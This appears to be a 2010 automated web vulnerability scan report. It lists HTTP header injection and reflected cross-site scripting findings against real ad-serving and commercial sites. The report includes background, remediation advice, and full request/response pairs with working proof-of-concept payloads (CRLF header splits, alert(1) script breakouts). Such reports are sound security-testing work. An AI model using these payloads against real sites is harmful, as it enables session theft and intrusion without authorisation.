2.312. http://www.constantcontact.com/privacy_guarantee.jsp [Referer HTTP header]

2.313. http://www.constantcontact.com/safesubscribe.jsp [Referer HTTP header]

2.314. http://www.constantcontact.com/search/index.jsp [Referer HTTP header]

2.315. http://www.constantcontact.com/social-media-for-small-business/index.jsp [Referer HTTP header]

2.316. https://www.constantcontact.com/add-product.jsp [Referer HTTP header]

2.317. https://www.constantcontact.com/features/signup.jsp [Referer HTTP header]

2.318. https://www.constantcontact.com/login.jsp [Referer HTTP header]

2.319. https://www.constantcontact.com/styles.jsp [Referer HTTP header]

2.320. http://www.kayak.co.uk/h/landing [Referer HTTP header]

2.321. http://www.kayak.co.uk/in [Referer HTTP header]

2.322. http://www.kayak.co.uk/s/search/air [Referer HTTP header]

2.323. http://www.kayak.co.uk/s/search/hotel [Referer HTTP header]

2.324. http://www.kayak.com/h/landing [Referer HTTP header]

2.325. http://www.kayak.com/in [Referer HTTP header]

2.326. http://www.kayak.com/s/search/air [Referer HTTP header]

2.327. http://www.kayak.com/s/search/hotel [Referer HTTP header]

2.328. http://www.kovasys.com/tabid/91/jobid/850/language/en-US/Default.aspx [Referer HTTP header]

2.329. http://www.kovasys.com/tabid/91/jobid/851/language/en-US/Default.aspx [Referer HTTP header]

2.330. http://www.kovasys.com/tabid/91/jobid/852/language/en-US/Default.aspx [Referer HTTP header]

2.331. http://www.kovasys.com/tabid/91/jobid/853/language/en-US/Default.aspx [Referer HTTP header]

2.332. http://www.kovasys.com/tabid/91/jobid/854/language/en-US/Default.aspx [Referer HTTP header]

2.333. http://www.kovasys.com/tabid/91/jobid/855/language/en-US/Default.aspx [Referer HTTP header]

2.334. http://www.kovasys.com/tabid/91/jobid/856/language/en-US/Default.aspx [Referer HTTP header]

2.335. http://www.kovasys.com/tabid/91/jobid/857/language/en-US/Default.aspx [Referer HTTP header]

2.336. http://www.kovasys.com/tabid/91/jobid/859/language/en-US/Default.aspx [Referer HTTP header]

2.337. http://www.kovasys.com/tabid/91/jobid/860/language/en-US/Default.aspx [Referer HTTP header]

2.338. http://www.kovasys.com/tabid/91/jobid/861/language/en-US/Default.aspx [Referer HTTP header]

2.339. http://www.kovasys.com/tabid/91/jobid/862/language/en-US/Default.aspx [Referer HTTP header]

2.340. http://www.kovasys.com/tabid/91/jobid/863/language/en-US/Default.aspx [Referer HTTP header]

2.341. http://www.kovasys.com/tabid/91/jobid/864/language/en-US/Default.aspx [Referer HTTP header]

2.342. http://www.kovasys.com/tabid/91/jobid/865/language/en-US/Default.aspx [Referer HTTP header]

2.343. http://www.kovasys.com/tabid/91/jobid/867/language/en-US/Default.aspx [Referer HTTP header]

2.344. http://www.kovasys.com/tabid/91/jobid/868/language/en-US/Default.aspx [Referer HTTP header]

2.345. http://ads1.dbaseregistry.com/13161 [redirect parameter]

2.346. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.347. http://tour.xxxmatch.com/free_adult_dating_shortstrip_heather_v6/53425/atnight/ [REST URL parameter 1]

2.348. http://tour.xxxmatch.com/free_adult_dating_shortstrip_heather_v6/53425/banneratnight/ [REST URL parameter 1]

2.349. http://www.skulealumni.ca/ [name of an arbitrarily supplied request parameter]



1. HTTP header injection  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/adj/can.en.aff.packseek/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/can.en.aff.packseek/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 98e82%0d%0a76a5e13095a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /98e82%0d%0a76a5e13095a/can.en.aff.packseek/;tile=1;sz=728x90;dcopt=ist;pos=1;ord=9552020735? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/98e82
76a5e13095a
/can.en.aff.packseek/%3Btile%3D1%3Bsz%3D728x90%3Bdcopt%3Dist%3Bpos%3D1%3Bord%3D9552020735:
Date: Thu, 25 Nov 2010 03:22:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://adc2.adcentriconline.com/adcentric/form/1679/2/48846 [ADCUserID cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adc2.adcentriconline.com
Path:   /adcentric/form/1679/2/48846

Issue detail

The value of the ADCUserID cookie is copied into the Set-cookie response header. The payload 42420%0d%0a917ff1327c0 was submitted in the ADCUserID cookie. This caused a response containing an injected HTTP header.

Request

GET /adcentric/form/1679/2/48846;id=24577 HTTP/1.1
Host: adc2.adcentriconline.com
Proxy-Connection: keep-alive
Referer: http://assets.adcentriconline.com/adc2_creatives/1679/12370/BANNER_2.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1679-1-48846=12370; ADCUserID=42420%0d%0a917ff1327c0

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:21:26 GMT
Server: Apache
X-RealServer: h009
P3P: CP="NOI OTC OTP OUR NOR"
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Thu, 23 Sep 2004 17:42:04 GMT
Set-cookie: ADCUserID=42420
917ff1327c0
; expires=Friday, 02-Oct-2020 23:21:26 GMT; path=/; domain=.adcentriconline.com;
Location: http://www.healthycanadians.gc.ca/kids?utm_content=12370-300x250_egg_en&utm_campaign=1679-adv_0256_10_depa&utm_source=48846-canoe_homepage_e&utm_medium=Banner&utm_term=3379-300_x_250
Refresh: 0; URL=http://www.healthycanadians.gc.ca/kids?utm_content=12370-300x250_egg_en&utm_campaign=1679-adv_0256_10_depa&utm_source=48846-canoe_homepage_e&utm_medium=Banner&utm_term=3379-300_x_250
Connection: close
Content-Type: text/html
Content-Length: 298

<html><head><meta http-equiv="Refresh" content="0; URL=http://www.healthycanadians.gc.ca/kids?utm_content=12370-300x250_egg_en&utm_campaign=1679-adv_0256_10_depa&utm_source=48846-canoe_homepage_e&utm_
...[SNIP]...

1.3. http://adc2.adcentriconline.com/adcentric/tag/1679/1/48846 [ADCUserID cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adc2.adcentriconline.com
Path:   /adcentric/tag/1679/1/48846

Issue detail

The value of the ADCUserID cookie is copied into the Set-cookie response header. The payload bf0b4%0d%0ad950371efe9 was submitted in the ADCUserID cookie. This caused a response containing an injected HTTP header.

Request

GET /adcentric/tag/1679/1/48846?ADCadcifr=1&secure=false&number=0.8746649911627173 HTTP/1.1
Host: adc2.adcentriconline.com
Proxy-Connection: keep-alive
Referer: http://en.canoe.ca/home.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADCUserID=bf0b4%0d%0ad950371efe9

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:21:04 GMT
Server: Apache
X-RealServer: h002
P3P: CP="NOI OTC OTP OUR NOR"
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Thu, 23 Sep 2004 17:42:04 GMT
Set-cookie: ADCUserID=bf0b4
d950371efe9
; expires=Friday, 02-Oct-2020 23:21:04 GMT; path=/; domain=.adcentriconline.com;
Set-cookie: 1679-1-48846=12370; path=/; domain=.adcentriconline.com;
Last-Modified: Thu, 25 Nov 2010 03:21:04 GMT
Connection: close
Content-Type: text/javascript
Content-Length: 13980

// adc2 headers
var adc_creative_12370_clicks = [];
var adc_creative_12370_events = [];
adc_creative_12370_clicks['CLICK'] = 'http://adc2.adcentriconline.com/adcentric/form/1679/2/48846;id=24577';
adc
...[SNIP]...

1.4. http://bs.serving-sys.com/BurstingPipe/AdServer.bs [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/AdServer.bs

Issue detail

The value of the gclid request parameter is copied into the Location response header. The payload 3ddc4%0d%0ad12b749299a was submitted in the gclid parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/AdServer.bs?cn=ccs&ebcmp=10024154&ebkw=14755179&advid=14140&ebag=254128&sead=5994273590&ccsurl=$$http://www.acs-inc.com/information-technology-outsourcing.aspx?utm_campaign=ACS_IT&utm_medium=cpc&utm_source=Google&utm_term=IT_Consulting$$&gclid=3ddc4%0d%0ad12b749299a HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: E2=08.I820wrF066N820wrV06Bz820wrm07l0820wrU077T820wrt02WGm5xorY07ftg410rN0a4cg410rM03Mo820wrG0apK820wrU07SK820wrM04uwg210rm0bnAo61wrM09KL820wrB; A2=fkeq9MHl0a4c0000820wrM7Iq09Ki403Mo0000820wrGeoI79FWT077T0000820wrte8Pq9PnD0apK0000820wrUfn3P9MHm0a4c0000820wrMeYSU9K9V08.I0000820wrFe5f79MHk07SK0000820wrMd4wf9ADI04uw0000820wreeicB9PMC066N0000820wrVeWk99QTI02WG0000820wrYePYM9Pla07l00000820wrUf8gM9QTI02WG9QTJe3wUrYfnfJ9MZe07ft0000820wrNe96Q9DzZ04uw0000820wrmehqN9DzW06Bz0000820wrmeLLf9Mw60bnA0000o61wrMeOls9MZc07ft0000820wrNcZyK9IMO09KL0000820wrB; B2=4VLS0820wrM52DV0820wre49Zx0820wrG6.ws0820wrF6msk0820wrB7dNR0820wrY7dNS0e3wUrY6Y5t0820wrU6SKC0820wrt7d1H0o61wrM7c7l0820wrN5svs0820wrU7ycg0820wrN6VE50820wrm67xs0820wrm7hMh0g410rM704G0820wrV; C3=0uP4m5xorY0000w00_0lN6820wrG0000004_0t3m820wrm0000004_0ppC820wrU000000g_0uyM820wrN0000001_0rCe820wrm0000002_0nCJ820wrM000000g_0vsV820wrN0000001_0oLK820wrB000000g_0o2A820wre000000w_0tIT820wrt00000w0_0ub+820wrF0000001_0q+Y820wrU0000040_0nez820wrV0000010_0uXig410rM0000002_0u72o61wrM0000004_; D3=0oLK00Hs820wrB0q+Y07jq820wrU0lN600w1820wrG0u7202Rfo61wrM0nCJ02bP820wrM0uXi00Y3g410rM0tIT02fx820wrt0ub+01Cq820wrF0uyM005D820wrN0uP400dDm5xorY0o2A03sH820wre0t3m0053820wrm0rCe0053820wrm0nez01B9820wrV0vsV00as820wrN0ppC007X820wrU; u2=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 25 Nov 2010 02:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: ccsession=14755179-1.1290651706_
Location: http://www.acs-inc.com/information-technology-outsourcing.aspx?utm_campaign=ACS_IT&utm_medium=cpc&utm_source=Google&utm_term=IT_Consulting&gclid=3ddc4
d12b749299a

Set-Cookie: F1=00UilH0003sY9QW1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Content-Length: 0


2. Cross-site scripting (reflected)  previous
There are 349 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf0c8'-alert(1)-'99f6756b9a2 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=bf0c8'-alert(1)-'99f6756b9a2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7207
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 25 Nov 2010 03:23:25 GMT
Expires: Thu, 25 Nov 2010 03:23:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=bf0c8'-alert(1)-'99f6756b9a2http://www.waldorfastoria.com/bestofwaldorfastoria?WT.mc_id=zWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632&cssiteid=1004575&csdartid=5603020439232393\">
...[SNIP]...

2.2. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4e6"-alert(1)-"393bdbf10bd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=6b4e6"-alert(1)-"393bdbf10bd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7207
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 25 Nov 2010 03:23:20 GMT
Expires: Thu, 25 Nov 2010 03:23:20 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=6b4e6"-alert(1)-"393bdbf10bdhttp://www.waldorfastoria.com/bestofwaldorfastoria?WT.mc_id=zWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632&cssiteid=1004575&csdartid=5603020439232393");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

2.3. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e40b"-alert(1)-"0bd3d85d780 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA5e40b"-alert(1)-"0bd3d85d780&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:20:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
xU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA5e40b"-alert(1)-"0bd3d85d780&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%2
...[SNIP]...

2.4. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9602b'-alert(1)-'f13f8625afd was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA9602b'-alert(1)-'f13f8625afd&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
xU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA9602b'-alert(1)-'f13f8625afd&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%2
...[SNIP]...

2.5. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 244e8"-alert(1)-"214cc8b87e2 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

